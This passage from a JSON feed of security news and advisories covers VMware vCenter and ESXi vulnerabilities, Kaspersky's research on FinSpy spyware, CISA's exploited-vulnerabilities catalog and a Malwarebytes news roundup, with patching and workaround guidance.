\u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. 
Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. 
Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol.\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. 
\u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, the victim\u2019s machine is vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the C2 server terminates the infection process.\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that 
infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. 
Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. 
There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-06T19:25:47", "description": "A security vulnerability in VMware\u2019s Cloud Foundation, ESXi, Fusion and Workstation platforms could pave the way for hypervisor takeover in virtual environments \u2013 and a patch is still pending for some users.\n\nThe issue affects a wide swath of the virtualization specialist\u2019s portfolio and affects Windows, Linux and Mac users. Details about the platforms:\n\n * Cloud Foundation is VMware\u2019s multicloud management platform, providing software-defined services for compute, storage, network, security, Kubernetes and so on.\n * ESXi is a bare-metal hypervisor that installs on a server and partitions it into multiple virtual machines (VMs).\n * Fusion is a software hypervisor that allows Intel-based Macs to run VMs with guest operating systems \u2013 such as Microsoft Windows, Linux, NetWare, Solaris or macOS.\n * Workstation enables users to set up VMs on a single physical machine.\n\nThe bug (CVE-2021-22045) is a high-severity heap-overflow vulnerability carrying a CVSS rating of 7.7 out of 10. 
Heap overflows are memory issues that can result in data corruption or unexpected behavior by any process that accesses the affected memory area \u2013 in some cases resulting in remote code execution (RCE).\n\nIn this case, the problem specifically exists in the CD-ROM device emulation function of the affected products.\n\n\u201cA malicious actor with access to a virtual machine with CD-ROM device emulation may be able to exploit this vulnerability in conjunction with other issues, to execute code on the hypervisor from a virtual machine,\u201d the vendor noted in its advisory. \u201cSuccessful exploitation requires a CD image to be attached to the virtual machine.\u201d\n\nReno Robert, senior vulnerability researcher for Trend Micro\u2019s Zero Day Initiative, told Threatpost that the issue results from \u201cthe lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer.\u201d\n\n## Complex but Dangerous Exploitation\n\nRobert added that even though the bug allows an untrusted guest OS user to execute code on the hypervisor, \u201can attacker would not have control over the data written, so exploitation of this would be difficult.\u201d\n\nHence the need for it to be used \u201cin conjunction with other issues.\u201d Reno explained that an example of other issues \u201ccould be an information-disclosure vulnerability that provides details on the memory layout. This would make exploitation more feasible.\u201d\n\nIf successful though, attackers could compromise the host operating system of the hypervisor. 
Taking over a hypervisor, which is the highly privileged software that creates and runs VMs and governs how resources are shared among them (such as memory and processing), can give cybercriminals a clear path to accessing any of the data or applications stored in the VMs it controls, and executing code or installing files on those VMs, depending on the security controls that are implemented.\n\nResearcher \u201cJaanus K\u00e4\u00e4p\u201d with Clarified Security and Trend Micro\u2019s ZDI were credited with discovering the bug.\n\n## **Patch VMware CVE-2021-22045 Now**\n\nAffected product versions are: ESXi 6.5, 6.7 and 7 (version 7 remains unpatched for now); Fusion 12.x; Workstation 16.x; and all versions of VMware Cloud Foundation. Patch information can be found in the [vendor\u2019s advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0001.html>).\n\nUsers should patch as soon as possible, given that VMware is a favorite target for cybercriminals. For instance, just days after a critical CVE-2021-22005 RCE vulnerability in VMware vCenter was disclosed, a full working exploit [was public and being used](<https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/>) in the wild.\n\nESXi users are especially at risk: While the solution makes it easy for multiple VMs to share the same hard-drive storage, it also sets systems up to be one-stop shopping spots for attacks, researchers say, since attackers can target the centralized virtual hard drives used to store data from across VMs.\n\n\u201cESXi servers represent an attractive target for ransomware threat actors because they can attack multiple VMs at once, where each of the VMs could be running business-critical applications or services,\u201d Andrew Brandt, principal researcher at Sophos, [recently explained](<https://threatpost.com/vmware-esxi-encrypted-python-script-ransomware/175374/>). 
\u201cAttacks on hypervisors can be both fast and highly disruptive.\u201d\n\nHe was discussing a spate of attacks in October that used Python code that took less than three hours to complete a ransomware attack on ESXi servers, from initial breach to encryption. That incident joined other ransomware efforts targeting the hypervisor: REvil ransomware threat actors last year came up with a [Linux variant](<https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/>) that targeted VMware ESXi; and in September [HelloKitty joined](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>) the growing list going after the juicy target. DarkSide [also targeted](<https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version>) ESXi servers last year.\n\n## **Workaround for ESXi v.7 Users**\n\nOf course, all of that is bad news for ESXi v.7 users, who don\u2019t yet have a patch for this latest bug. VMware did, however, [issue a workaround](<https://kb.vmware.com/s/article/87249>) that can be used for now, involving disabling CD-ROM/DVD functionality.\n\nThe steps are:\n\n 1. Log in to a vCenter Server system using the vSphere Web Client.\n 2. Right-click the virtual machine and click Edit Settings.\n 3. 
Select the CD/DVD drive and uncheck \u201cConnected\u201d and \u201cConnect at power on\u201d and remove any attached ISOs.\n\nTo enumerate the VMs that have a CD-ROM/DVD device attached, users can run the following command, according to the vendor:\n\n`Get-VM | Get-CDDrive | Where {$_.extensiondata.connectable.connected -eq $true} | Select Parent`\n\nThen the following command will remove and disconnect the attached CD-ROM/DVD device:\n\n`Get-VM | Get-CDDrive | Where {$_.extensiondata.connectable.connected -eq $true} | Set-CDDrive -NoMedia -confirm:$false`\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-06T16:47:44", "type": "threatpost", "title": "Partially Unpatched VMware Bug Opens Door to Hypervisor Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-22045"], "modified": "2022-01-06T16:47:44", "id": "THREATPOST:52B3DE7108A575C635073D53A3E635EE", "href": "https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. 
A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. 
These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. 
See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, 
"acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-05T07:36:59", "description": "Vmware VMware vCenter Server is a suite of server and virtualization management software from Vmware, Inc. The software provides a centralized platform for managing VMware vSphere environments, automating the implementation and delivery of virtual infrastructure. vCenter Server is vulnerable to a file upload vulnerability that could be exploited by an attacker to execute code on vCenter Server by uploading specially crafted files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cnvd", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-12-21T00:00:00", "id": "CNVD-2021-101199", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-101199", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-09-28T21:19:09", "description": "#### THREAT LEVEL: Green.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202136.pdf>)\n\nVMware has issued patches for 19 new vulnerabilities. CVE-2021-22005 is the worst of the lot, defined as "an arbitrary file upload vulnerability in the Analytics service" of the vCenter Server. An attacker with network access to vCenter Server's port 443 might use this flaw to execute code on the server by uploading a specially crafted file. VMware also provides a temporary workaround for individuals who are unable to instantly patch their appliances.\n\n#### Vulnerability Details\n\n  \n\n#### Patch Link\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>\n\n#### References\n\n<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>\n\n<https://www.theregister.com/2021/09/22/vmware_emergency_vcenter_patch_recommendation/>", "cvss3": {}, "published": "2021-09-22T13:29:07", "type": "hivepro", "title": "Drop everything and patch VMware\u2019s vCenter Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T13:29:07", "id": "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "href": "https://www.hivepro.com/drop-everything-and-patch-vmwares-vcenter-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator 
[gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! 
Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! 
Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig)\n * Mobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [timed to 